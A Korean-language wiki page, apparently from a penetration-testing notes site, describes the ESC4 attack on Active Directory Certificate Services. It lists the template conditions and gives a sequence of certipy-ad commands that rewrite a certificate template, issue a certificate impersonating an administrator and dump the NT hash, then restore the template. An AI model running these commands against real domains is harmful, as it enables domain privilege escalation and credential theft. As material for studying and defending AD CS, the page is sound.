search

ESC4

ESC4은 다음과 같은 속성들이 모두 만족할 때 가능한 ADCS 공격입니다.

속성

Authorized Signatures Required

0

Requires Manager Approval

False

Enrollment Rights

공격자가 컨트롤 가능한 객체 이하의 권한

User ACL Principals

공격자가 컨트롤 가능한 객체

템플릿에 대해서 높은 권한을 가진 계정을 탈취하는데 성공하면 템플릿의 속성을 ESC1에 취약하게 변경할 수 있습니다.

hashtag
Abuse

UNIX
# 취약한 템플릿 열거
certipy-ad find -u '<username>' -p '<password>' -dc-ip '<dc-ip>' -vulnerable -stdout -enabled

# 템플릿 속성 변경
certipy-ad template -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -template '<template>' -write-default-configuration

# 템플릿을 통한 인증서 발급
certipy-ad req -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -target '<ca-fqdn>' -ca '<ca-name>' -template '<template>' -upn '<administrator@domain>' -sid '<sid>'

# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx '<pfx>' -dc-ip '<dc-ip>'

# 템플릿 속성 복구
certipy-ad template -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -template '<template>' -write-configuration 'ESC4.json' -no-save

hashtag
Root Cause

hashtag
User ACL Principals

템플릿에 대해서 GenericAll, GenericWrite 권한이 있으면 해당 템플릿의 모든 속성을 ESC1에 적합하도록 변경할 수 있습니다. 악용을 위해 변경하는 속성들에 대한 설명은 ESC1을 참고하세요.

User ACL Principals

hashtag
References

LogoActive Directory Certificate Services (ADCS – ESC4) | RBT SecurityRBT Security | Reinventing The Securitychevron-right
LogoAD CS 102: How to Detect and Mitigate ESC4 Attacks on… | BeyondTrustBeyondTrustchevron-right
https://redteam.wiki/postexploitation/active-directory/adcs/esc4redteam.wikichevron-right
PreviousESC3NextESC5

Last updated